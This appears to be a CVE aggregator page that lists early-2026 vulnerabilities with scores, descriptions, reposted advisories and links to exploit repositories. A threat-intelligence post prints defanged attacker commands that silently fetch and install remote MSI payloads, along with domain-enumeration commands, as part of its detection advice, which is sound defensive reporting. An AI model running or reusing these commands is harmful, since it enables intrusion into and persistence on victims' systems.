🟠 CVE-2026-25791 - High (7.5)

Sliver is a command and control framework that uses a custom Wireguard netstack. Prior to 1.7.0, the DNS C2 listener accepts unauthenticated TOTP bootstrap messages and allocates server-side DNS sessions without validating OTP values, even when En...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25639
(7.5 HIGH)

EPSS: 0.01%

updated 2026-02-09T22:39:36

2 posts

# Denial of Service via **proto** Key in mergeConfig ### Summary The `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service. ### Details The vulnerability exists in `lib/core/

mastokukei@social.josko.org at 2026-02-11T09:02:35.000Z ##

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei masto.kukei.eu/browse/programm category:
- Git default branch: Git 3.0 will make "main" the default branch by end of 2026.
- COLRv1 in WebKit: COLRv1 font rendering support in WebKit.
- Linux kernel 7.0: io_uring gains filtering support (cBPF opcodes) and per-task filters.
- AWS Lambda CVEs: 29 CVEs across 27 Lambda base images; CVE-2026-25639 affecting base images.
- Post-OOP: Move [1/2]

##

thehackerwire@mastodon.social at 2026-02-09T21:16:07.000Z ##

🟠 CVE-2026-25639 - High (7.5)

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25761
(8.8 HIGH)

EPSS: 0.04%

updated 2026-02-09T21:55:30.093000

1 posts

Super-linter is a combination of multiple linters to run as a GitHub Action or standalone. From 6.0.0 to 8.3.0, the Super-linter GitHub Action is vulnerable to command injection via crafted filenames. When this action is used in downstream GitHub Actions workflows, an attacker can submit a pull request that introduces a file whose name contains shell command substitution syntax, such as $(...). In

thehackerwire@mastodon.social at 2026-02-09T21:19:48.000Z ##

🟠 CVE-2026-25761 - High (8.8)

Super-linter is a combination of multiple linters to run as a GitHub Action or standalone. From 6.0.0 to 8.3.0, the Super-linter GitHub Action is vulnerable to command injection via crafted filenames. When this action is used in downstream GitHub ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25057
(9.1 CRITICAL)

EPSS: 0.04%

updated 2026-02-09T21:55:30.093000

1 posts

MarkUs is a web application for the submission and grading of student assignments. Prior to 2.9.1, instructors are able to upload a zip file to create an assignment from an exported configuration (courses/<:course_id>/assignments/upload_config_files). The uploaded zip file entry names are used to create paths to write files to disk without checking these paths. This vulnerability is fixed in 2.9.1

thehackerwire@mastodon.social at 2026-02-09T20:23:31.000Z ##

🔴 CVE-2026-25057 - Critical (9.1)

MarkUs is a web application for the submission and grading of student assignments. Prior to 2.9.1, instructors are able to upload a zip file to create an assignment from an exported configuration (courses//assignments/upload_config_files). The upl...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-69214
(8.8 HIGH)

EPSS: 0.01%

updated 2026-02-09T21:53:03.017000

1 posts

OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attacker can inject malicious SQL code through the options[matricola] parameter.

thehackerwire@mastodon.social at 2026-02-09T22:53:32.000Z ##

🟠 CVE-2025-69214 - High (8.8)

OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attac...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2234
(9.1 CRITICAL)

EPSS: 0.05%

updated 2026-02-09T09:30:28

2 posts

C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read and modify any user's mail content.

beyondmachines1 at 2026-02-11T13:01:32.480Z ##

HGiga Patches Critical Authentication Bypass and SQL Injection Flaws in C&Cm@il

HGiga patched three vulnerabilities in its C&Cm@il platform, including a critical missing authentication flaw (CVE-2026-2234) that allows unauthenticated attackers to read and modify any user's emails.

**If you use HGiga C&Cm@il, plan a quick update to version 7.0-978. Since the most severe flaw allows attackers to read mail without a password, treat this as a high-priority emergency patch.**

beyondmachines.net/event_detai

##

beyondmachines1@infosec.exchange at 2026-02-11T13:01:32.000Z ##

HGiga Patches Critical Authentication Bypass and SQL Injection Flaws in C&Cm@il

HGiga patched three vulnerabilities in its C&Cm@il platform, including a critical missing authentication flaw (CVE-2026-2234) that allows unauthenticated attackers to read and modify any user's emails.

**If you use HGiga C&Cm@il, plan a quick update to version 7.0-978. Since the most severe flaw allows attackers to read mail without a password, treat this as a high-priority emergency patch.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-1731(CVSS UNKNOWN)

EPSS: 3.57%

updated 2026-02-07T00:30:34

2 posts

BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability. By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.

Nuclei template

3 repos

https://github.com/z3r0h3ro/CVE-2026-1731-exp

https://github.com/bytehazard/CVE-2026-1731

https://github.com/win3zz/CVE-2026-1731

CVE-2025-69212(CVSS UNKNOWN)

EPSS: 0.09%

updated 2026-02-06T22:11:48

1 posts

## Summary A critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server. ## Vulnerable Code **File:** `src/Util/XML.php:100` ```php public static function decodeP7M($file) { $directory = pathinfo($fil

thehackerwire@mastodon.social at 2026-02-09T22:53:23.000Z ##

🟠 CVE-2025-69212 - High (8.8)

OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25752(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-02-06T21:42:47

2 posts

### Summary **Description** An authorization bypass vulnerability in FUXA allows an unauthenticated, remote attacker to modify device tags via WebSockets. This affects FUXA through version 1.2.9. This issue has been patched in FUXA version 1.2.10. ### Impact This affects all deployments, including those with `runtime.settings.secureEnabled` set to `true`. Exploitation allows an unauthenticated,

thehackerwire@mastodon.social at 2026-02-10T15:02:59.000Z ##

🔴 CVE-2026-25752 - Critical (9.1)

FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An authorization bypass vulnerability in FUXA allows an unauthenticated, remote attacker to modify device tags via WebSockets. Exploitation allows an unauthenticated, remote...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T15:02:59.000Z ##

🔴 CVE-2026-25752 - Critical (9.1)

FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An authorization bypass vulnerability in FUXA allows an unauthenticated, remote attacker to modify device tags via WebSockets. Exploitation allows an unauthenticated, remote...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25751(CVSS UNKNOWN)

EPSS: 0.02%

updated 2026-02-06T21:42:43

2 posts

### Description An information disclosure vulnerability in FUXA allows an unauthenticated, remote attacker to retrieve sensitive administrative database credentials. This affects FUXA through version 1.2.9. This issue has been patched in FUXA version 1.2.10. ### Impact This affects all deployments, including those with `runtime.settings.secureEnabled` set to `true`. Exploitation allows an unauth

thehackerwire@mastodon.social at 2026-02-10T15:02:49.000Z ##

🟠 CVE-2026-25751 - High (7.5)

FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An information disclosure vulnerability in FUXA allows an unauthenticated, remote attacker to retrieve sensitive administrative database credentials. Exploitation allows an ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T15:02:49.000Z ##

🟠 CVE-2026-25751 - High (7.5)

FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An information disclosure vulnerability in FUXA allows an unauthenticated, remote attacker to retrieve sensitive administrative database credentials. Exploitation allows an ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-64175(CVSS UNKNOWN)

EPSS: 0.01%

updated 2026-02-06T19:06:46

2 posts

Contact OpenAI Security Research at outbounddisclosures@openai.com to engage on this report. See PDF report for easier reading. Security Advisory: 2FA Bypass via Recovery Code Vulnerability Type: 2FA Authentication Bypass Affected Software: GOGS Severity: High Date: Aug 5, 2025 Discoverer: OpenAI Security Research Summary Gogs’ 2FA recovery code validation does not scope codes by user, enabling

beyondmachines1 at 2026-02-11T12:01:32.269Z ##

Critical Gogs Vulnerabilities Enable Remote Code Execution and 2FA Bypass

Gogs released security updates to address a critical RCE vulnerability (CVE-2025-64111) and a 2FA bypass (CVE-2025-64175) affecting self-hosted Git instances. These flaws allow authenticated attackers to execute system commands via malicious Git configurations or take over user accounts by misusing recovery codes.

**If you are using self-hosted Gogs, this is important - especially if your Gogs is publicly accessible and free to register. Update to version 0.13.4. If you cannot patch right away, restrict network access to your Git service and ensure only trusted users can register and push code.**

beyondmachines.net/event_detai

##

beyondmachines1@infosec.exchange at 2026-02-11T12:01:32.000Z ##

Critical Gogs Vulnerabilities Enable Remote Code Execution and 2FA Bypass

Gogs released security updates to address a critical RCE vulnerability (CVE-2025-64111) and a 2FA bypass (CVE-2025-64175) affecting self-hosted Git instances. These flaws allow authenticated attackers to execute system commands via malicious Git configurations or take over user accounts by misusing recovery codes.

**If you are using self-hosted Gogs, this is important - especially if your Gogs is publicly accessible and free to register. Update to version 0.13.4. If you cannot patch right away, restrict network access to your Git service and ensure only trusted users can register and push code.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-64111(CVSS UNKNOWN)

EPSS: 0.09%

updated 2026-02-06T19:06:45

2 posts

### Summary Due to the insufficient patch for the https://github.com/gogs/gogs/security/advisories/GHSA-wj44-9vcg-wjq7, it's still possible to update files in the `.git` directory and achieve remote command execution. ### Details Function `UpdateRepoFile` security check under some if conditions. While UpdateRepoFile call in API router will NOT match any of them. It's still possible to update `.

beyondmachines1 at 2026-02-11T12:01:32.269Z ##

Critical Gogs Vulnerabilities Enable Remote Code Execution and 2FA Bypass

Gogs released security updates to address a critical RCE vulnerability (CVE-2025-64111) and a 2FA bypass (CVE-2025-64175) affecting self-hosted Git instances. These flaws allow authenticated attackers to execute system commands via malicious Git configurations or take over user accounts by misusing recovery codes.

**If you are using self-hosted Gogs, this is important - especially if your Gogs is publicly accessible and free to register. Update to version 0.13.4. If you cannot patch right away, restrict network access to your Git service and ensure only trusted users can register and push code.**

beyondmachines.net/event_detai

##

beyondmachines1@infosec.exchange at 2026-02-11T12:01:32.000Z ##

Critical Gogs Vulnerabilities Enable Remote Code Execution and 2FA Bypass

Gogs released security updates to address a critical RCE vulnerability (CVE-2025-64111) and a 2FA bypass (CVE-2025-64175) affecting self-hosted Git instances. These flaws allow authenticated attackers to execute system commands via malicious Git configurations or take over user accounts by misusing recovery codes.

**If you are using self-hosted Gogs, this is important - especially if your Gogs is publicly accessible and free to register. Update to version 0.13.4. If you cannot patch right away, restrict network access to your Git service and ensure only trusted users can register and push code.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-2103
(7.1 HIGH)

EPSS: 0.01%

updated 2026-02-06T18:30:43

1 posts

Infor SyteLine ERP uses hard-coded static cryptographic keys to encrypt stored credentials, including user passwords, database connection strings, and API keys. The encryption keys are identical across all installations. An attacker with access to the application binary and database can decrypt all stored credentials.

CVE-2026-24423
(9.8 CRITICAL)

EPSS: 9.22%

updated 2026-02-06T18:30:29

1 posts

SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be executed by the vulnerable application.

1 repos

https://github.com/aavamin/CVE-2026-24423

youranonnewsirc@nerdculture.de at 2026-02-09T19:45:26.000Z ##

Here's a summary of the latest technology and cybersecurity news from the last 24-48 hours:

Major tech firms globally plan to invest over $650 billion in AI infrastructure this year. OpenAI has launched "Frontier," a new enterprise platform for AI agents.

In cybersecurity, CISA mandated US federal agencies replace unsupported edge devices within 18 months due to state-sponsored exploitation. Russia's APT28 targeted European entities with a new Microsoft Office exploit. A critical SmarterMail flaw (CVE-2026-24423) is actively exploited in ransomware attacks. (Feb 6-7, 2026).

#News #Anonymous #AnonNews_irc

##

CVE-2026-0227
(7.5 HIGH)

EPSS: 0.06%

updated 2026-02-06T17:37:28.723000

2 posts

A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial of service (DoS) to the firewall. Repeated attempts to trigger this issue results in the firewall entering into maintenance mode.

2 repos

https://github.com/CkAbhijit/CVE-2026-0227-Advanced-Scanner

https://github.com/TeeyaR/CVE-2026-0227-Palo-Alto

AAKL at 2026-02-10T20:56:25.538Z ##

Palo Alto advisory, posted yesterday:

Moderate: CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal security.paloaltonetworks.com/

##

AAKL@infosec.exchange at 2026-02-10T20:56:25.000Z ##

Palo Alto advisory, posted yesterday:

Moderate: CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal security.paloaltonetworks.com/ #PaloAlto #infosec #vulnerability

##

CVE-2026-21643
(9.8 CRITICAL)

EPSS: 0.13%

updated 2026-02-06T09:30:35

6 posts

An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiClientEMS 7.4.4 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests.

technadu at 2026-02-10T18:17:33.135Z ##

Fortinet’s CVE-2026-21643 highlights a persistent issue: management and control-plane components remain prime attack surfaces.

SQL injection leading to unauthenticated code execution reinforces the need for rapid patch cycles, continuous monitoring, and segmentation of security tooling.

Source: thehackernews.com/2026/02/fort

💬 How are you reducing blast radius for management infrastructure?

🔔 Follow @technadu for threat-focused security coverage

##

jbhall56 at 2026-02-10T12:46:19.971Z ##

The vulnerability, tracked as CVE-2026-21643, has a CVSS rating of 9.1 out of a maximum of 10.0. thehackernews.com/2026/02/fort

##

beyondmachines1 at 2026-02-10T08:01:33.587Z ##

Critical SQL Injection Vulnerability in Fortinet FortiClientEMS Allows Remote Code Execution

Fortinet patched a critical SQL injection vulnerability (CVE-2026-21643) in FortiClientEMS that allows unauthenticated attackers to execute arbitrary code.

**If you are using FortiClientEMS make sure the management interface is isolated from the internet and accessible only from trusted networks. Then plan a quick patch if you are on 7.4 versions. Attackers will start exploting this very soon.**

beyondmachines.net/event_detai

##

technadu@infosec.exchange at 2026-02-10T18:17:33.000Z ##

Fortinet’s CVE-2026-21643 highlights a persistent issue: management and control-plane components remain prime attack surfaces.

SQL injection leading to unauthenticated code execution reinforces the need for rapid patch cycles, continuous monitoring, and segmentation of security tooling.

Source: thehackernews.com/2026/02/fort

💬 How are you reducing blast radius for management infrastructure?

🔔 Follow @technadu for threat-focused security coverage

#Infosec #Fortinet #VulnerabilityResearch #SQLInjection #ZeroTrust #CyberDefense #TechNadu

##

jbhall56@infosec.exchange at 2026-02-10T12:46:19.000Z ##

The vulnerability, tracked as CVE-2026-21643, has a CVSS rating of 9.1 out of a maximum of 10.0. thehackernews.com/2026/02/fort

##

beyondmachines1@infosec.exchange at 2026-02-10T08:01:33.000Z ##

Critical SQL Injection Vulnerability in Fortinet FortiClientEMS Allows Remote Code Execution

Fortinet patched a critical SQL injection vulnerability (CVE-2026-21643) in FortiClientEMS that allows unauthenticated attackers to execute arbitrary code.

**If you are using FortiClientEMS make sure the management interface is isolated from the internet and accessible only from trusted networks. Then plan a quick patch if you are on 7.4 versions. Attackers will start exploting this very soon.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-25049
(9.9 CRITICAL)

EPSS: 0.03%

updated 2026-02-05T20:22:47.870000

5 posts

n8n is an open source workflow automation platform. Prior to versions 1.123.17 and 2.5.2, an authenticated user with permission to create or modify workflows could abuse crafted expressions in workflow parameters to trigger unintended system command execution on the host running n8n. This issue has been patched in versions 1.123.17 and 2.5.2.

1 repos

https://github.com/otakuliu/Expression-Sandbox-Escape-Simulation-Lab

jbz@indieweb.social at 2026-02-11T17:12:01.000Z ##

🐞 Breaking Down CVE-2026-25049: How TypeScript Types Failed n8n's Security // Het Mehta

「 CVE-2026-25049, a critical vulnerability with a CVSS score of 9.4 that let attackers execute arbitrary system commands on n8n servers. What makes this particularly interesting (and painful for n8n’s security team) is that this vulnerability bypassed a security fix they had just deployed two months earlier 」

hetmehta.com/posts/n8n-type-co

#typescript #rce #cybersecurity #CVE202625049

##

lobsters@mastodon.social at 2026-02-11T09:00:23.000Z ##

Breaking Down CVE-2026-25049: How TypeScript Types Failed n8n's Security via @wezm lobste.rs/s/wepiig #security
hetmehta.com/posts/n8n-type-co

##

jbz@indieweb.social at 2026-02-11T17:12:01.000Z ##

🐞 Breaking Down CVE-2026-25049: How TypeScript Types Failed n8n's Security // Het Mehta

「 CVE-2026-25049, a critical vulnerability with a CVSS score of 9.4 that let attackers execute arbitrary system commands on n8n servers. What makes this particularly interesting (and painful for n8n’s security team) is that this vulnerability bypassed a security fix they had just deployed two months earlier 」

hetmehta.com/posts/n8n-type-co

#typescript #rce #cybersecurity #CVE202625049

##

lobsters@mastodon.social at 2026-02-11T09:00:23.000Z ##

Breaking Down CVE-2026-25049: How TypeScript Types Failed n8n's Security via @wezm lobste.rs/s/wepiig #security
hetmehta.com/posts/n8n-type-co

##

hackmag@infosec.exchange at 2026-02-09T21:00:09.000Z ##

⚪ Critical bug in n8n opened the door to RCE

🗨️ A critical vulnerability has been discovered in the n8n workflow automation platform that allowed arbitrary command execution on the server side. The issue, identified as CVE-2026-25049 (scored 9.4 on the CVSS scale), affects the sandbox mechanism that is supposed to isolate the execution of JavaScr…

🔗 hackmag.com/news/n8n-patch?utm

#news

##

CVE-2026-20119
(7.5 HIGH)

EPSS: 0.09%

updated 2026-02-05T14:57:20.563000

2 posts

A vulnerability in the text rendering subsystem of Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient validation of input received by an affected device. An attacker could exploit this vulnerability by gettin

AAKL at 2026-02-11T17:13:28.359Z ##

Cisco posted two advisories yesterday, if you missed them.

- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability sec.cloudapps.cisco.com/securi

- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities sec.cloudapps.cisco.com/securi @cisco

##

AAKL@infosec.exchange at 2026-02-11T17:13:28.000Z ##

Cisco posted two advisories yesterday, if you missed them.

- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability sec.cloudapps.cisco.com/securi

- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities sec.cloudapps.cisco.com/securi @cisco #Cisco #infosec #vulnerability

##

exploitdb_bot@mastodon.social at 2026-02-11T10:01:08.000Z ##

🚨 New Exploit: Windows 10.0.17763.7009 - spoofing vulnerability
📋 CVE: CVE-2025-24054
👤 Author: beatrizfn

🔗 exploit-db.com/exploits/52480

#ExploitDB #InfoSec #CyberSecurity #CVE-2025-24054

##

CVE-2025-40551
(9.8 CRITICAL)

EPSS: 54.99%

updated 2026-02-04T02:00:02.030000

1 posts

SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.

Nuclei template

hasamba at 2026-02-10T14:26:34.786Z ##

----------------

🎯 Threat Intelligence
===================

Executive summary: Huntress observed active exploitation of SolarWinds Web Help Desk (WHD) tied to recent untrusted-deserialization vulnerabilities, notably CVE-2025-26399 and CVE-2025-40551. Attackers achieved remote code execution and quickly deployed legitimate remote-management and DFIR tooling to maintain access.

Technical details:
• Initial process chain reported: wrapper.exe (WHD service wrapper) spawned java.exe (Tomcat-based WHD) which launched cmd.exe to silently install MSI payloads.
• Observed staged installers and deployment vectors:
• msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi (Zoho/ManageEngine RMM agent)
• msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi (Velociraptor MSI)
• Remote access persistence included unattended Zoho Assist/ManageEngine registration tied to Proton Mail account esmahyft@proton[.]me.
• Post-exploitation activity included Active Directory discovery using net group "domain computers" /do, executed from the RMM agent process TOOLSIQ.EXE.

Attack chain analysis:
• Initial Access: Exploitation of WHD deserialization vulnerabilities (CVE-2025-26399, CVE-2025-40551).
• Download: MSI payloads hosted on third-party services (Catbox, Supabase).
• Execution: Silent MSI installation via spawned command process from WHD service chain.
• Persistence & Lateral Movement: Legitimate RMM agent configured for unattended access; AD enumeration to enumerate domain targets.
• C2/Tooling: Velociraptor deployed and configured pointing at attacker-controlled storage/infrastructure.

Detection considerations:
• Monitor for anomalous child processes of wrapper.exe/java.exe and unexpected use of msiexec pulling from unusual domains.
• Look for registrations or sessions associated with Zoho/ManageEngine agents and unusual agent process names like TOOLSIQ.EXE.
• Review AD enumeration activity (net group queries) originating from endpoints hosting WHD or RMM agents.

Limitations & notes:
• Huntress observed exploitation across three customers and reports protection coverage across 84 endpoints in 78 organizations using WHD.
• Public advisories include Microsoft notes and CISA listing for CVE-2025-40551; versions prior to 12.8.7 HF1 are reported as vulnerable.

🔹 solarwinds -2025-26399 -2025-40551

🔗 Source: huntress.com/blog/active-explo

##

CVE-2026-1281
(9.8 CRITICAL)

EPSS: 16.41%

updated 2026-01-30T13:28:18.610000

2 posts

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

1 repos

https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE

undercodenews@mastodon.social at 2026-02-10T10:24:32.000Z ##

Stealth Cyber Attack Targets Ivanti EPMM: Dormant Backdoors Found Exploiting Critical Flaws

A new, stealthy cyber campaign has emerged, targeting Ivanti Endpoint Manager Mobile (EPMM) systems since February 4, 2026. Unlike conventional ransomware or data-stealing attacks, this operation is designed to stay hidden, silently establishing long-term access for future malicious activity. Exploiting two critical vulnerabilities—CVE-2026-1281 and CVE-2026-1340—attackers are…

undercodenews.com/stealth-cybe

##

teezeh@ieji.de at 2026-02-10T07:06:07.000Z ##

“Reports that two previously patched Ivanti remote code execution (RCE) bugs were exploited at the Dutch Data Protection Authority and Judicial Council and at the European Union (EU) raised concerns worldwide that these attacks will spread.

The two 9.8 RCEs are in Ivanti Endpoint Manager Mobile (EPMM). One of the RCEs, CVE-2026-1281 was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog Jan. 28. The other 9.8 bug was CVE-2026-1340.

Security teams were told to consider this case an emergency patch situation.”

scworld.com/news/emergency-pat

##

CVE-2026-1340
(9.8 CRITICAL)

EPSS: 0.18%

updated 2026-01-30T00:31:28

2 posts

A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.

1 repos

https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE

undercodenews@mastodon.social at 2026-02-10T10:24:32.000Z ##

Stealth Cyber Attack Targets Ivanti EPMM: Dormant Backdoors Found Exploiting Critical Flaws

A new, stealthy cyber campaign has emerged, targeting Ivanti Endpoint Manager Mobile (EPMM) systems since February 4, 2026. Unlike conventional ransomware or data-stealing attacks, this operation is designed to stay hidden, silently establishing long-term access for future malicious activity. Exploiting two critical vulnerabilities—CVE-2026-1281 and CVE-2026-1340—attackers are…

undercodenews.com/stealth-cybe

##

teezeh@ieji.de at 2026-02-10T07:06:07.000Z ##

“Reports that two previously patched Ivanti remote code execution (RCE) bugs were exploited at the Dutch Data Protection Authority and Judicial Council and at the European Union (EU) raised concerns worldwide that these attacks will spread.

The two 9.8 RCEs are in Ivanti Endpoint Manager Mobile (EPMM). One of the RCEs, CVE-2026-1281 was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog Jan. 28. The other 9.8 bug was CVE-2026-1340.

Security teams were told to consider this case an emergency patch situation.”

scworld.com/news/emergency-pat

##

CVE-2015-10145
(8.8 HIGH)

EPSS: 0.10%

updated 2026-01-29T18:32:39

2 posts

Gargoyle router management utility versions 1.5.x contain an authenticated OS command execution vulnerability in /utility/run_commands.sh. The application fails to properly restrict or validate input supplied via the 'commands' parameter, allowing an authenticated attacker to execute arbitrary shell commands on the underlying system. Successful exploitation may result in full compromise of the dev

hrbrmstr@mastodon.social at 2026-02-10T14:21:22.000Z ##

@todb Oh mighty CVE Seer! Pray expound upon which arcane spell doth cause a 2025 birthed vulnerability to don a CVE-2015 prefix?

CVE-2015-10145 — Published: 2025-12-31

##

hrbrmstr@mastodon.social at 2026-02-10T14:21:22.000Z ##

@todb Oh mighty CVE Seer! Pray expound upon which arcane spell doth cause a 2025 birthed vulnerability to don a CVE-2015 prefix?

CVE-2015-10145 — Published: 2025-12-31

##

CVE-2025-15467
(9.8 CRITICAL)

EPSS: 0.66%

updated 2026-01-29T15:31:31

2 posts

Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AEAD parameters can trigger a stack buffer overflow. Impact summary: A stack buffer overflow may lead to a crash, causing Denial of Service, or potentially remote code execution. When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 para

4 repos

https://github.com/guiimoraes/CVE-2025-15467

https://github.com/MAXI8594/CVE-2025-15467_Scan

https://github.com/balgan/CVE-2025-15467

https://github.com/mr-r3b00t/CVE-2025-15467

AAKL at 2026-02-10T16:30:27.662Z ##

This critical Broadcom vulnerability advisory was updated yesterday. You'll need a login for details.

Broadcom Mainframe Software Security Advisory for Critical OpenSSL Vulnerability CVE-2025-15467 support.broadcom.com/web/ecx/s

##

AAKL@infosec.exchange at 2026-02-10T16:30:27.000Z ##

This critical Broadcom vulnerability advisory was updated yesterday. You'll need a login for details.

Broadcom Mainframe Software Security Advisory for Critical OpenSSL Vulnerability CVE-2025-15467 support.broadcom.com/web/ecx/s #infosec #Broadcom #vulnerability

##

CVE-2026-20817
(7.8 HIGH)

EPSS: 0.06%

updated 2026-01-13T18:31:17

1 posts

Improper handling of insufficient permissions or privileges in Windows Error Reporting allows an authorized attacker to elevate privileges locally.

undercodenews@mastodon.social at 2026-02-10T14:08:37.000Z ##

Windows Error Reporting Flaw Lets Standard Users Reach SYSTEM: Inside CVE-2026-20817

Introduction A quiet but deeply dangerous vulnerability inside Windows Error Reporting (WER) has exposed a new path for local privilege escalation, allowing ordinary users to obtain near-SYSTEM level control. Tracked as CVE-2026-20817 and patched by Microsoft in January 2026, the flaw sits in a core crash-handling mechanism that runs by default on nearly every Windows machine. While no…

undercodenews.com/windows-erro

##

CVE-2026-20026
(5.8 MEDIUM)

EPSS: 0.13%

updated 2026-01-08T18:08:54.147000

2 posts

Multiple&nbsp;Cisco products are affected by a vulnerability in the processing of DCE/RPC requests that could allow an unauthenticated, remote attacker to cause the Snort 3 Detection Engine to leak sensitive information or to restart, resulting in an interruption of packet inspection. This vulnerability is due to an error in buffer handling logic when processing DCE/RPC requests, which can resu

AAKL at 2026-02-11T17:13:28.359Z ##

Cisco posted two advisories yesterday, if you missed them.

- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability sec.cloudapps.cisco.com/securi

- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities sec.cloudapps.cisco.com/securi @cisco

##

AAKL@infosec.exchange at 2026-02-11T17:13:28.000Z ##

Cisco posted two advisories yesterday, if you missed them.

- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability sec.cloudapps.cisco.com/securi

- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities sec.cloudapps.cisco.com/securi @cisco #Cisco #infosec #vulnerability

##

CVE-2026-20027
(5.3 MEDIUM)

EPSS: 0.04%

updated 2026-01-08T18:08:54.147000

2 posts

Multiple Cisco products are affected by a vulnerability in the processing of DCE/RPC requests that could allow an unauthenticated, remote attacker to cause the Snort 3 Detection Engine to leak sensitive information or to restart, resulting in an interruption of packet inspection. This vulnerability is due to an error in buffer handling logic when processing DCE/RPC requests, which can result in

AAKL at 2026-02-11T17:13:28.359Z ##

Cisco posted two advisories yesterday, if you missed them.

- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability sec.cloudapps.cisco.com/securi

